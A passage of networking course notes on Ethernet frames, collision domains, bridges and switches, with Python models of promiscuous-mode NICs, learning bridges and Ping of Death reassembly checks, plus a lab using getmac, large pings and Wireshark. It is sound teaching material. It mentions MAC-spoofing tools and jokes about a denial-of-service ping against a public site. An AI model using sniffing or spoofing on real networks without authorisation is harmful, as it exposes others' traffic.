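    """Header-only frame (no padding or CRC), enough for the address check."""
    return parse_mac(dst) + parse_mac(src) + (0x0800).to_bytes(2, "big") + payload


# Constructed traffic on a shared wire: every NIC on the segment sees all three frames.
WIRE = [
    make_frame("00:00:0C:11:22:33", "00:00:0C:AA:BB:CC", b"for alice"),
    make_frame("00:00:0C:44:55:66", "00:00:0C:AA:BB:CC", b"for bob"),
    make_frame("FF:FF:FF:FF:FF:FF", "00:00:0C:AA:BB:CC", b"for everyone"),
]

if __name__ == "__main__":
    print(describe_mac("06:01:03:02:2A:3D"))
    print(Nic("00:00:0C:11:22:33").deliver(WIRE))                    # alice's own frame + broadcast
    print(Nic("00:00:0C:11:22:33", promiscuous=True).deliver(WIRE))  # everything on the wire
    print(Nic("00:00:0C:DE:AD:00").deliver(WIRE))                    # a bystander: broadcast only
```

Alice's NIC passes up her own frame and the broadcast; a third host that nobody addressed sees only the broadcast. The same card with promiscuous mode switched on passes up all three payloads, including Bob's, which is exactly the exposure described in the next paragraph and the reason a host in promiscuous mode on a shared segment is worth detecting.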
A vulnerability of Ethernet is the ease with which an Ethernet card can be programmed to accept all frames, even frames addressed to other users. So, any user who sets their NIC to promiscuous mode can examine the traffic sent by all other users.

4. Ethernet's Solution to the Error Control Problem

Recall from the picture of the Ethernet frame shown on page 272 that the last four bytes are used for the Cyclic Redundancy Code (CRC). The CRC is used for error detection. Ethernet can only detect errors; it cannot correct errors. If a frame arrives with errors, it is simply discarded. (Higher-layer protocols may later recognize the loss of data and take action to remedy the problem, such as by requesting retransmission. Ethernet, though, simply discards frames containing errors without giving the matter a second thought.)

An Aside

Ethernet's CRC algorithm hinges on a special number that mathematicians have devised. This number, given the name CRC-32, is special because it almost never divides evenly into other numbers, i.e., it almost always leaves a remainder when it is divided into another number. When the NIC crafts a frame to transmit, it fills the four byte CRC field with the specific bits that will make the total frame (including the CRC field) perfectly divisible (with no remainder) by CRC-32. When this frame is received by the destination, the destination NIC divides the received frame by CRC-32. If the frame arrives without errors, the result of the division will be zero and the frame will be accepted. If any bits were flipped en-route from source to destination the resulting division will leave a remainder and the frame will be discarded.

5. Ethernet's Solution to the Multiple Access Problem

We have already outlined the mechanism by which Ethernet users share a channel. They listen first before transmitting (so as not to collide with the transmissions of other users). Suppose we have 4 users on a 10 Mbps Ethernet.
The 4 users share the 10 Mbps capacity of the network. If all 4 users have a lot to say, then each user will, on average, get to use the network ¼ of the time. As a rough approximation, we can say that each of the 4 users will get to send at 2.5 Mbps. From each user's perspective, they are on a 2.5 Mbps network, not a 10 Mbps network.

Make sure you are clear on why things work this way: In Ethernet, users might share a medium, and any user's transmission will prevent all others on that same shared medium from transmitting. When one of the four users in our scenario above transmits, the other three users will be prevented from transmitting because they will first sense the channel and will not intentionally collide with another user. We say that the four users in this example share a "collision domain." If users have the ability to collide with each other, they are in the same collision domain.

As a back-of-the-envelope calculation, we can say that the bandwidth (footnote 22) available to a user is given by:

    BW per user = (Total BW available in the collision domain) / (Number of users sharing the collision domain)

Footnote 22: In networking, the term bandwidth has two meanings. One meaning of bandwidth is data rate, measured in bits per second. That is the meaning which we use in this chapter. Later in this course (in the Wireless Module) we will encounter the other meaning of the term bandwidth.

Practice Problem 12.9 What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below?

[Figure 13.15: A network with and without a bridge]

Solution:

Practice Problem 12.10 What is the bandwidth available to each of the users on the 10 Mbps Ethernet shown below?

[Figure]

Solution:

II. Connecting Users on an Ethernet LAN

1. Hubs

Ethernet first used a bus topology with heavy garden-hose size coaxial cable. In a bus topology, all users are connected in a straight-line configuration, as in the example on the prior page.
Later, the communication medium transitioned to unshielded twisted pair (UTP), which was ubiquitous in most office buildings. Most buildings were set up such that UTP wires terminated in a central electrical cabinet that served as a hub. Here, the term hub was simply meant as a "center of activity," the way the term is still used as in "Denver is a hub for United Airlines." The picture below illustrates this idea.

[Figure 1.10: An isolated LAN connecting 12 computers to a hub in a closet (electrical closet, windows, stray cup of coffee). From Forouzan, Data Communications and Networking, McGraw Hill, 2007]

Now, devices called Ethernet hubs are used to connect the twisted pairs from each host together.

[Figure: Ethernet hub]

Using the hub pictured above, we can connect four hosts together simply by plugging each host's NIC into one of the hub's four ports. When using a hub, we can consider the hosts to be, for practical purposes, electrically soldered together at the hub. Frames that arrive at one port are sent out on all other ports. A frame arriving on one port is not buffered or stored—it is simply transmitted out on all of the other ports. Fault isolation is easy with hubs—we merely have to unplug the problem host. Adding and removing hosts is also easy—we just plug in new users and unplug hosts that we want to remove from the LAN.

It is important to note that a hub is a physical layer device. It only recognizes the existence of bits. When bits arrive on one port, they are sent out on all of the remaining ports. A hub does not understand that some bits that arrive are Ethernet addresses and some bits that arrive are CRC, and so forth. To a hub, everything is just bits.

Practice Problem 12.11 Consider the 10 Mbps Ethernet shared by the busy users in the network below. The network uses three 4-port hubs. How much bandwidth is available to each user?

[Figure 13.15: A network with and without a bridge]

Solution:

2. Separating Collision Domains with Bridges

A bridge is similar to a hub in that it can be used to connect multiple hosts or multiple LANs. The distinction is that a bridge will only transmit what has to be sent to the other LAN, whereas the hub will send all information. To make this distinction clear, consider the picture below, which shows two Ethernet LANs joined together by a bridge.

[Figure: two Ethernet LANs joined by a bridge. Hosts 1, 2, 3, 4, 5 and 6 are on the left LAN; Hosts 9, 10, 11, 12, 13 and 14 are on the right LAN]

Suppose Host 3 wants to send a frame to Host 5. Host 3 sends the frame out on the left LAN and it arrives at all users on that LAN, including the bridge. The bridge will inspect the frame, and see that it is destined for Host 5. The bridge knows that Host 5 is on the left LAN and must have already received the frame (since everyone on the left LAN received the frame). The important point: the bridge will not forward the frame to the right-side LAN since the bridge knows that Host 5 is not on the right-side LAN.

A bridge can be used to connect two or more Ethernet LANs like a hub, but—unlike a hub—a bridge can divide up the hosts into separate collision domains. When a frame arrives, the bridge looks at the source and destination Ethernet addresses. The bridge then decides whether the frame should be forwarded (and if so, to which outgoing port). Since a bridge looks at and understands data link addresses, it operates at the data link layer (Layer 2). A bridge is said to be a "Layer-2 connecting device."

The main advantage of bridges over hubs is improved performance. We may want to split a single heavily loaded LAN into separate LANs to improve performance by limiting collisions and forwarding only when we have to.

[Figure 13.15: A network with and without a bridge]

Bridges have a few ancillary advantages. Bridges enhance reliability, since a single bad user (outputting continuously) will not disable all hosts; if bridges are used, the bad user will only kill his segment. Additionally, bridges can be used to enhance security, since we can isolate portions of the network and only forward frames where they must go.

Practice Problem 12.12 Consider users employing 10 Mbps Ethernet. How much bandwidth does each user get in each of the three scenarios below?

(a) Scenario 1: [Figure]
(b) Scenario 2: [Figure]
(c) Scenario 3: [Figure]

Solution: (a) (b) (c)

We should note that the results of the preceding calculations are, at best, approximations. We are presuming that a bridge port provides as much traffic on a LAN as a typical user. For example, in the picture above, consider the top-left collision domain. This collision domain has three users, plus the bridge port. The bridge port, however, is conveying the traffic from nine other users (the users on the other three LANs), so it may not be the case that the bridge port contributes the same amount of traffic in this collision domain as the other three users. Nevertheless, since bridges are often used to separate users who do not communicate very often, assuming a bridge port acts as a typical user often yields satisfactory results.

3. Switched Ethernet

Look at Scenario 3 above, which shows 12 users on a 4-port bridge. In this case the 12 users are divided into four collision domains, with three users (and a bridge port) within each collision domain. What would happen if we had the 12 users on a 12-port bridge? In this case each user would be in his own collision domain (sharing it only with the bridge). An N-port bridge that serves N hosts is referred to as a "Layer-2 switch" or an "L-2 switch". Consider the scenario depicted below, which shows 7 users connected to a 9-port bridge. From here on out, whenever the number of users is less than or equal to the number of ports (as is the case here), we will use the term Layer-2 switch, or simply switch, instead of the term bridge.

[Figure: 7 users connected to a 9-port bridge]

Do collisions still occur? The answer is Yes, but only between a user and the switch.
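As an added example (not code from the notes), the following Python models the decision a bridge or L-2 switch makes for each arriving frame: it learns which port each source address was heard on, forwards a unicast frame only to the port where the destination was learned, drops the frame when the destination is on the segment it arrived from (the Host 3 to Host 5 case above), and floods to every other port, like a hub, when the destination is unknown or the frame is a broadcast. Host addresses and the sequence of frames are constructed for the walk-through.

```python
"""Added example, not from the EC310 notes: the forwarding decision of a learning
bridge / Layer-2 switch.  Host addresses and the traffic sequence are constructed."""

BROADCAST = "ff:ff:ff:ff:ff:ff"


class LearningBridge:
    """Each port is a separate collision domain.  The bridge builds its table by
    watching source addresses; nothing is configured by hand."""

    def __init__(self, ports: int):
        self.ports = ports
        self.table = {}      # MAC address -> port it was last heard on

    def handle(self, in_port: int, src: str, dst: str) -> list:
        """Return the list of ports the frame is transmitted on (possibly empty)."""
        if not 0 <= in_port < self.ports:
            raise ValueError("no such port")
        self.table[src] = in_port                       # learn (or refresh) the source
        other_ports = [p for p in range(self.ports) if p != in_port]
        if dst == BROADCAST:
            return other_ports                          # broadcast reaches every segment
        out_port = self.table.get(dst)
        if out_port is None:
            return other_ports                          # unknown destination: flood, like a hub
        if out_port == in_port:
            return []                                   # destination already heard it on its own LAN
        return [out_port]                               # known destination: one port only


def two_lan_walkthrough() -> list:
    """Left LAN on port 0, right LAN on port 1, as in the two-LAN picture above."""
    host3 = "00:00:0c:00:00:03"    # constructed addresses
    host5 = "00:00:0c:00:00:05"
    host10 = "00:00:0c:00:00:0a"
    bridge = LearningBridge(ports=2)
    return [
        bridge.handle(0, host5, BROADCAST),  # Host 5 broadcasts: bridge learns it is on port 0
        bridge.handle(0, host3, host5),      # Host 3 -> Host 5: same LAN, not forwarded
        bridge.handle(0, host3, host10),     # Host 10 not yet known: flooded to port 1
        bridge.handle(1, host10, host3),     # Host 10 replies: learned on port 1, sent to port 0 only
        bridge.handle(0, host3, host10),     # now the bridge knows: port 1 only
    ]


def per_port_switch_walkthrough() -> dict:
    """A 12-port switch with one host per port: once each host has spoken, every
    unicast frame from host 0 goes to exactly one port, so no other host's NIC,
    even in promiscuous mode, receives it."""
    switch = LearningBridge(ports=12)
    hosts = ["00:00:0c:00:01:%02x" % n for n in range(12)]   # constructed
    for port, mac in enumerate(hosts):
        switch.handle(port, mac, BROADCAST)
    return {n: switch.handle(0, hosts[0], hosts[n]) for n in range(1, 12)}


if __name__ == "__main__":
    print(two_lan_walkthrough())
    print(per_port_switch_walkthrough())
```

The second walk-through shows why switched Ethernet narrows the promiscuous-mode exposure noted earlier in the chapter: a unicast frame between two hosts never appears on a third host's port once the switch has learned both addresses. Broadcasts, and frames to addresses the switch has not yet learned, are still sent out every port, so those remain visible to any NIC that is listening.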
In the scenario above, all hosts can successfully transmit at the same time since each port is now a separate collision domain. Note that L-2 switches, like bridges, look at frame addresses, and operate at the data link layer. While many people use the two terms interchangeably, a switch is most often used to connect individual computers, whereas bridges usually connect LANs. Thus, in this taxonomy, with L-2 switches each computer is in its own collision domain, whereas with bridges each connected LAN forms a collision domain.

Practice Problem 12.13 You have set up an Ethernet LAN for 10 users. For simplicity, assume the network has an efficiency of 100% and that resources are shared equally among users. How much bandwidth is available to each user if:
(a) The 10 users are connected on a 10 Mbps Ethernet to a hub.
(b) The 10 users are connected on a 10 Mbps switched Ethernet.

Solution: (a) (b)

Practice Problem 12.14 You want to set up an Ethernet LAN for a group of 10 offices at the Pentagon. Each office requires 2 digital telephone lines (64 kbps each). Additionally, each office must support a peak web browsing demand of 40,000 bytes/min.
(a) What is the total bit rate demand of the LAN?
(b) Would a standard 10 Mbps Ethernet suffice?

Solution: (a) (b)

Practice Problem 12.15 Match the column on the left with the description on the right:
Network Interface Card    (a) Looks at MAC address and then forwards the frame on the correct port
Hub                       (b) Copies incoming bits to all other ports
Switch                    (c) Piece of equipment with a unique address that translates bits to signals and transmits the signals on the medium.

Practice Problem 12.16 If an entire IP packet has 8096 bytes, how many Ethernet frames are required to transmit this packet?

Solution:

Practice Problem 12.17 Answer True or False to the following statements:
(a) An Ethernet address is normally expressed in decimal.
(b) An Ethernet address is burned into hardware and never changes.
(c) An Ethernet address is used at the network layer to address packets.
(d) An Ethernet address, MAC address, and Hardware address are all the same thing.
(e) When I log on to different networks my Ethernet Address can change every time.

An Aside: Fast Ethernet (1995)

Fast Ethernet uses the same frame format as "standard Ethernet", i.e., it still uses 48-bit data link addresses and uses the same frame fields as shown on page 314 of these notes. Fast Ethernet is backward-compatible with standard Ethernet. And, perhaps surprisingly, it uses the same minimum and maximum frame lengths as standard Ethernet. Also, it has the same maximum physical length as standard Ethernet (100 meters for UTP). There is a big difference: Fast Ethernet operates at 100 Mbps.

So…how do we raise the data rate? The details are rather technical, and have to do with the improvements in technology over the years. The original Ethernet operates at 10 Mbps, but required a special type of signaling called Manchester encoding. Advances in transmission media allowed for a signaling scheme that supported higher data rates. Better clock circuitry allowed us to raise the transmission speed without worrying about loss of synchronization. Instead of using one twisted pair, we use four twisted pairs: 1 to the switch, 1 from the switch, and 2 that are switchable to support the current direction of traffic flow.

TWISTED PAIR 1: Always to the network
TWISTED PAIR 2: Always from the network
TWISTED PAIR 3 and TWISTED PAIR 4: Can be switched from one direction to the other, to support the current desired direction of traffic flow

Finally, 3-level signaling is used at the physical layer. Instead of sending a 0 or 1, we can send 0, -1 or +1.

Problems

1. What are the advantages of dividing an Ethernet LAN with a bridge?

2. What is the relationship between a switch and a bridge?

3. Suppose the Ethernet data link layer receives 42 bytes of data from the network layer. How many bytes of padding must be added to the data?

4. What is the ratio of useful data to the entire packet for the smallest Ethernet frame?

5. Suppose we have a standard 10 Mbps Ethernet LAN, on which the average frame size is 1000 bytes. If a noise burst of 2 msec occurs on the LAN, how many frames are destroyed?

6. Sketch the Ethernet packet required to send the text string "Hello World" from Alice (whose MAC address is 11:22:33:44:55:66) to Bob (whose MAC address is AA:BB:CC:DD:EE:FF). Your error correction bits are 0101 1100 1010 1010 1111 1110 1011 1101. Assume that any padding bytes consist of all-zeroes, and that the Length/Type field is used as a Length field. You do not need to show the bytes added by the physical layer. RECALL: ALL VALUES ARE REPRESENTED IN HEXADECIMAL!

7. Consider the network below, which shows four 10 Mbps LANs connected by two bridges, labeled B1 and B2. Assume all users (labeled 1 through 7) are very chatty and equally chatty.

[Figure: four 10 Mbps LANs (LAN 1, LAN 2, LAN 3 and LAN 4) with users 1 through 7, connected by bridges B1 and B2]

(a) What is the effective data rate seen by user 4?
(b) What is the effective data rate seen by user 5?
(c) What is the effective data rate seen by user 6?
(d) What is the effective data rate seen by user 6 if the two bridges are replaced with hubs?

8. Two standard (10 Mbps) Ethernet topologies are illustrated in Figure 1 and Figure 2 for a network consisting of six computers.

[Figure 1] [Figure 2]

(a) How much bandwidth does each user get for the network topology depicted in Figure 1?
(b) How much bandwidth does each user get for the network topology depicted in Figure 2?
(c) How much bandwidth would each user get if a switch was used to connect together the six computers in my network?

Security Exercise 12

Part 1. Your Ethernet Address

A computer is connected to a network by a Network Interface Card (NIC), also termed a network adapter.
That is, the NIC is the physical interface between a computer and the networking medium. The networking medium, in turn, might be a wire, a fiber optic strand, or free space (in the case of wireless networks). Each NIC is assigned a globally unique address burned into the card's Read Only Memory. All machines on an Ethernet LAN are guaranteed to have unique addresses. No two Ethernet users anywhere in the world can have the same global address. Addresses are 6 bytes, of which 46 bits are used for the unique address.

The NIC interfaces with the physical media, so this globally-unique address is often called the physical address. Since physical devices are often termed hardware, a NIC's unique address is also frequently referred to as a hardware address. Finally, since the NIC controls access between the computer and the networking media, its address is also termed a Media Access Control (MAC) address. Since most NICs conform to the Ethernet standard, the NIC address is also called an Ethernet address. Thus, the NIC address goes by four different names which are often used interchangeably:

Physical Address
Hardware Address
MAC Address
Ethernet Address

In Windows, open a command prompt. (To open a command prompt, click the Start button, type cmd in the search box and press Enter.) At the command prompt, type:

    getmac /v

Question 1. Ignoring VMware virtual adapters and Wi-Fi, what is your computer's Ethernet address?

Recall that a MAC address is 48 bits. The first 3 bytes provide the address of the NIC manufacturer (or vendor). The Institute of Electrical and Electronics Engineers (IEEE) assigns blocks of addresses to various manufacturers. For a listing of vendor codes, see http://standards.ieee.org/develop/regauth/oui/oui.txt

Question 2. What vendor manufactured your Ethernet card?

Question 3. Ward Hall has a policy that midshipmen can only connect their original issued computers to the USNA network.
Suppose you go to Best Buy, buy a new computer and connect it to the network. Will Ward Hall be able to tell? If so, how?

Can you "spoof" your MAC address—i.e., have your computer tell the rest of the world your MAC address is different from the actual value burned into ROM? The answer is: Yes, it is very easy to spoof your MAC address—it requires a change to one line of the easy-to-edit Windows registry. However, you should not do this since even a small screw-up while editing the Windows registry can irreparably damage your computer. Bottom line, unless you are a CS major with a 4.0 QPR and ten computers (so you have a few to spare), you should never edit the Windows registry.

But, can't I download freeware (for example, Technitium) or buy inexpensive products (like SMAC) that will correctly do this registry change for me? And, oh, by the way: Who am I?

You can do this, but the ITSD User Agreement that you have signed in blood forbids it. So, if you download this software you will be fried. Don't do it!

That wouldn't have stopped me!

Don't listen to him midshipman! Times have changed since 1958! You will be fried! DON'T DO IT!!!

Chicken!

Part 2. Using ping to Determine the Largest Possible Ethernet Frame Size

ping is a tool that can be used to determine whether our computer can reach another computer across the Internet.
From the Windows command prompt, type ping www.cnn.com

You should see something similar to:

    C:> ping www.espn.com

    Pinging www.espn.com [199.181.132.250] with 32 bytes of data:
    Reply from 199.181.132.250: bytes=32 time=74ms TTL=233
    Reply from 199.181.132.250: bytes=32 time=84ms TTL=233
    Reply from 199.181.132.250: bytes=32 time=76ms TTL=233
    Reply from 199.181.132.250: bytes=32 time=75ms TTL=233

    Ping statistics for 199.181.132.250:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 74ms, Maximum = 84ms, Average = 77ms

ping is a probing tool that sends a packet from our computer to the designated target computer (in this case, the computer with the name www.espn.com) and waits for a reply. The output above tells us several things:

our ping packet contains 32 bytes of data (it also happens to contain another 28 bytes of header information).
we conducted a total of 4 probes.
we received replies to all four of our probes.
the round trip times for our four probes were 74, 84, 76 and 75 milliseconds.

Looking at the ping reply above, notice that www.espn.com is also referred to as "199.181.132.250." This latter sequence of four numbers (separated by decimals) is, as you might already know, the computer's IP address. Thus, the computer named www.espn.com has IP address 199.181.132.250. We will discuss IP addresses in the next lecture.

When we use the ping command, we, by default, ping the target host with 32 bytes of data. We can change the size of the ping packet by using the -l option.
For example, if I type ping -l 100 www.cnn.com I will see something along these lines (but note that IP addresses can and do vary over time):

    Pinging www.espn.com [199.181.132.250] with 100 bytes of data:
    Reply from 199.181.132.250: bytes=100 time=75ms TTL=233
    Reply from 199.181.132.250: bytes=100 time=75ms TTL=233
    Reply from 199.181.132.250: bytes=100 time=74ms TTL=233
    Reply from 199.181.132.250: bytes=100 time=74ms TTL=233

    Ping statistics for 199.181.132.250:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 74ms, Maximum = 75ms, Average = 74ms

Notice that I pinged www.espn.com with 100 bytes of data. If I had typed ping -l 150 www.cnn.com I would have pinged with 150 bytes of data.

Hmmm... I wonder what would happen if I tried to ping www.espn.com with a very large packet. This would mean that the computer would have to stop for a long time and deal with my request. So, the services of www.espn.com would then be denied to others. I might just call this an attack...hmmm...a denial of service attack...yea, that's the ticket. I try to ping with 50,000 bytes by typing:

    ping -l 50000 www.cnn.com

and I see:

    Pinging www.espn.com [199.181.132.250] with 50000 bytes of data:
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.

    Ping statistics for 199.181.132.250:
        Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

Gasp! My plans for world domination are foiled! The target rejected my ping packets! Why? Well, Ethernet, which is the local area network technology used by just about everyone (including us!) will only allow the data packet to be at most a certain size. This maximum size is called the Maximum Transfer Unit (MTU). Well…what if we want to send a block of data bigger than Ethernet's MTU?
In general, there is no problem with this; the large block of data is broken (i.e., fragmented) into pieces (each of which is less than or equal to Ethernet's MTU), and these pieces are then sent individually. The pieces (fragments) are then put back together when they all arrive at the destination. In general, there is no hitch, except for one wrinkle: hosts will often ignore ping packets that were fragmented.

Why, you ask? Well, in the mid 1990's, it was discovered that if a ping packet was fragmented, it could be forced back together at the destination in such a way that the final size of the reconstituted packet was larger than the maximum permissible IP packet size, causing the host's operating system to crash. This scenario was given the somewhat unpleasant name: The Ping of Death.

The Bottom Line: You can crash someone's computer if you send them a ping that is so large that it cannot fit in one Ethernet frame, i.e., you can crash someone's computer if you send them a ping that exceeds Ethernet's MTU. Most operating systems are on to this behavior, and will not permit reception of a fragmented ping.

In summary, if you send a very large ping packet, it will need to be fragmented to fit inside Ethernet's MTU, but these fragments will then be ignored by the destination since there is no good reason someone should want to send me a ping packet that was so big that it had to be fragmented.

What is Ethernet's Maximum Transfer Unit? What is the largest block of data that Ethernet will allow me to send without requiring fragmentation? To see, we can use the -f option in the ping command. This option will mean that the packet will not be fragmented, so, if the packet is bigger than Ethernet's MTU, it won't be sent. For example, if I type

    ping -f -l 50000 www.cnn.com

I am told that the packet needs to be fragmented, but the packet will not be fragmented because the 'don't fragment' option (-f) has been used.

Question 4. What is Ethernet's MTU?
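An added example, not from the notes, to make the size bookkeeping in this part concrete: it computes the largest ping payload that fits in one frame, applies the 'don't fragment' rule, splits an oversize payload into fragments, and shows the check a receiving host applies before reassembly so that no set of fragments can be reconstituted into a packet bigger than IP allows (the defence against the Ping of Death just described). It assumes an Ethernet MTU of 1500 bytes and the 28 header bytes the notes mention (20 for the IP header plus 8 for the ICMP echo header); all fragment lists are constructed.

```python
"""Added example, not from the EC310 notes: the size arithmetic behind the ping
experiment and the reassembly check that guards against the Ping of Death.
The constants are assumptions stated here; all fragment lists are constructed."""

ETHERNET_MTU = 1500        # assumed: largest IP packet carried in one Ethernet frame
IP_HEADER = 20             # basic IP header
ICMP_HEADER = 8            # ping (ICMP echo) header; 20 + 8 = the notes' 28 bytes
MAX_IP_PACKET = 65535      # the IP total-length field is 16 bits


def largest_unfragmented_ping(mtu: int = ETHERNET_MTU) -> int:
    """Largest `ping -l` value that still fits in a single frame."""
    return mtu - IP_HEADER - ICMP_HEADER


def sent_with_dont_fragment(payload_len: int, mtu: int = ETHERNET_MTU) -> bool:
    """With the -f option a packet larger than the MTU is not sent at all."""
    return payload_len + IP_HEADER + ICMP_HEADER <= mtu


def fragment(ip_payload_len: int, mtu: int = ETHERNET_MTU) -> list:
    """Split an IP payload into (byte_offset, length) fragments.  Every fragment
    except the last carries a multiple of 8 bytes, because the real fragment
    offset field counts 8-byte units."""
    per_fragment = (mtu - IP_HEADER) // 8 * 8     # 1480 for a 1500-byte MTU
    fragments, offset = [], 0
    while offset < ip_payload_len:
        length = min(per_fragment, ip_payload_len - offset)
        fragments.append((offset, length))
        offset += length
    return fragments


def safe_to_reassemble(fragments: list, limit: int = MAX_IP_PACKET) -> bool:
    """A receiver's sanity check: refuse any fragment whose end would place the
    reassembled packet (header included) beyond the maximum IP packet size, and
    any offset that is not a whole number of 8-byte units."""
    for offset, length in fragments:
        if offset % 8 != 0 or length <= 0:
            return False
        if IP_HEADER + offset + length > limit:
            return False
    return True


def ping_experiment(payload_len: int, mtu: int = ETHERNET_MTU) -> dict:
    """Summarise what happens to `ping -l payload_len` on a link with this MTU."""
    frags = fragment(ICMP_HEADER + payload_len, mtu)
    return {
        "fits_in_one_frame": len(frags) == 1,
        "fragments": len(frags),
        "reassembly_ok": safe_to_reassemble(frags),
    }


if __name__ == "__main__":
    print("largest -l that avoids fragmentation:", largest_unfragmented_ping())
    print("ping -l 32:", ping_experiment(32))
    print("ping -l 50000:", ping_experiment(50000))
    print("oversize fragment set accepted:", safe_to_reassemble([(65528, 100)]))
```

The last line is the Ping of Death condition from the receiver's side: a fragment placed at an offset near the 64 KB limit would push the reassembled packet past the maximum, so a host that checks each fragment's end against the limit never builds the oversize packet in the first place.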
Note that whatever number seems to work for ping, you must add 28 to it, since the ping data has 28 bytes of header information tacked onto it.

Question 5. After you have completed Question 4, review the notes where we discussed the maximum size of an Ethernet frame. Does your answer to Question 4 match what the notes say is the maximum amount of data that can fit inside the data field of an Ethernet frame?

Part 3. Wireshark

Spurred by the Snowden revelations, The Guardian published an article titled "The NSA is turning the Internet into a total surveillance system." Others speculate that the NSA may be monitoring essentially all Internet traffic. Concerning the NSA's surveillance of Internet traffic, security expert Brian Reid opined that "This isn't a wiretap, it's a country-tap."

Our objective today is not to examine why such surveillance is done, but rather to gain a sense of how such surveillance is done. Toward that end, we will gain basic familiarity with a packet sniffer named Wireshark. A packet sniffer is, in essence, a wiretap that allows you to monitor the traffic passing a particular point in a computer network. A packet sniffer not only allows you to analyze or inspect individual packets as binary or hexadecimal symbols, but also attempts, where possible, to convert binary packets into a human-readable format. Packet sniffers allow the user to determine who is communicating with whom, and what they are saying, topics of great concern to network security specialists and the people who keep them busy.

Packet sniffing, as with most things, can be used for good purposes or for malicious purposes. A hacker can certainly use a packet sniffer to detect who is communicating with whom, and the nature of the communication (so-called metadata). Any unencrypted content (to include unencrypted passwords) can also be read. The NSA uses packet sniffers to thwart terrorist plots.
In June 2013 General Keith Alexander, the Director of the NSA, testified that the NSA's surveillance programs had foiled at least 50 terrorist attacks worldwide. Computer engineers use packet sniffers for good purposes also: A network can be analyzed to determine if there is excessive congestion, troubleshooting of faults can be facilitated, unauthorized network users can be detected, etc.

A. Getting Started

Wireshark is a packet sniffer that will capture packets and display them using a nice Graphical User Interface (GUI). Wireshark is a passive program; it does not transmit packets onto the network. It merely analyzes what traffic is going past your NIC.

Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark by selecting:

    Applications > Internet > Wireshark (as root)

Under File, click Open and highlight the file named packets, and then hit Open.

Now, after opening the file you should see something much more interesting. (If your display looks slightly different from that shown on the next page, don't worry. If it looks radically different, let the instructor know.)

[Figure: the Wireshark window, with the Packet List Pane at the top, the Packet Details Pane in the middle and the Packet Bytes Pane at the bottom]

This shows you all the packets that were in the file that was provided. Three pains...I mean panes...are provided. Referring to the figure above, we see the

Packet List Pane: This displays a summary of each packet captured. Each line represents a packet. You can see that the packets are numbered—Number 1, Number 2, etc. (This pane presents so-called metadata. From metadata we can determine such things as: Who is initiating the communication? Who is the intended recipient? What is the overall goal of the communication—is it an attempt to access a web site? Is it an attempt to send an email? Is it a file transfer?) By clicking on a packet in this pane, you control what is displayed in the two lower panes.
In the figure above, the first line (Packet 1) is highlighted in green, and the two other panes give details about this packet.

Packet Details Pane: Displays more details about the packet that you highlighted in the Packet List Pane.

Packet Bytes Pane: Displays gory details about the packet selected in the Packet List Pane, and highlights the field selected on the Packet Details Pane. Whereas the top pane reveals the metadata, this pane reveals all of the contents.

Take a moment to memorize the names of these three panes, so that when you see, for instance, "Packet Details Pane" you don't have to think: Which one was that again?

Okay, let's look at the Packet List Pane (which one was that again?). At the top of the Packet List Pane, starting at the left, we have the number (No) column. As mentioned, each packet that was captured is sequentially numbered by Wireshark.

Question 6. How many packets were captured?

Next over, we have the Time column. By default, this column indicates the relative time that each packet was received, with the first packet arriving at t = 0.

Question 7. What is the number of the packet that was received 10 seconds into this trace?

Let's look at packet 5182. Look at the Packet Details pane for this packet:

[Screenshot: Packet Details Pane for packet 5182]

This shows the protocols used by this packet. So, for instance, we see that this packet used Ethernet, the Internet Protocol (IP) and the Transmission Control Protocol (TCP). By clicking on the plus sign we can expand and collapse each of the listed protocols. The bottom pane, the Packet Bytes pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal.

Now, let's look at the Ethernet protocol in more detail. Click the arrow next to Ethernet and you should see this:

[Screenshot: the Ethernet section of the Packet Details Pane, expanded]

Question 8. Look at the first 12 hexadecimal digits in the Packet Bytes Pane. It reads:

    00 01 02 c6 3b 6a

This is the very start of the Ethernet frame.
Referring to the Ethernet frame format from your notes, what is the meaning of these 12 hexadecimal digits?

Question 9. Look at the next 12 hexadecimal digits in the Packet Bytes Pane. It reads:

    00 04 80 74 09 00

This is the next part of the Ethernet frame. Referring to the Ethernet frame format from your notes, what is the meaning of these 12 hexadecimal digits?

Question 10. Do your answers for Questions 8 and 9 match the info provided in the middle pane?

Question 11. Can Wireshark be used to determine the NIC card numbers of people using the network?

Question 12. Look at the next four hexadecimal digits in the Packet Bytes Pane. It reads:

    08 00

Referring to the Ethernet frame format from your notes, what is the meaning of these 4 hexadecimal digits?

Question 13. Go to the website http://www.cavebear.com/archive/cavebear/Ethernet/type.html. What type of information is carried in the data field of this Ethernet frame?

Look at packet number 2.

Question 14. What destination hardware address was used in this frame? What is the meaning of that value for the destination address?

Security Exercise 12 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:

Chapter 13: Internet Protocol

Objectives:
(a) Summarize the principles behind the design of the Internet Protocol.
(b) Define the structure of an IP address and define the purpose of network masking.
(c) Determine the address space available given an IP address and mask.
(d) Identify and explain the basic fields of the IP header.
(e) Understand the current use of the IP address space.

I. The Problem and the Solution

1. The Problem.

As computer networking took off in the 1970's, many different competing companies developed many different network architectures, each using different protocols at each layer. Each company advertised its own approach as "the best."
This explosion of different approaches was beneficial in that it fostered competition, with each company vying to make their own network architecture better. But, all the while, this presented a problem when people on different networks wanted to connect to each other. Originally, computers could only talk to other computers on the same network—but, at the same time, there was a strong desire to allow any two computers on any two networks to be able to communicate. This seemed infeasible: Different networks have different frame formats at the data link layer, different physical layer characteristics, different addressing schemes, etc.

Consider the internet shown below, which consists of a token ring (RIP), an Ethernet network and an IBM network (RIP) connected together. Each of these networks uses different frame formats, as shown. Could we just plop an Ethernet frame on a token ring network or an SNA network and have it work?

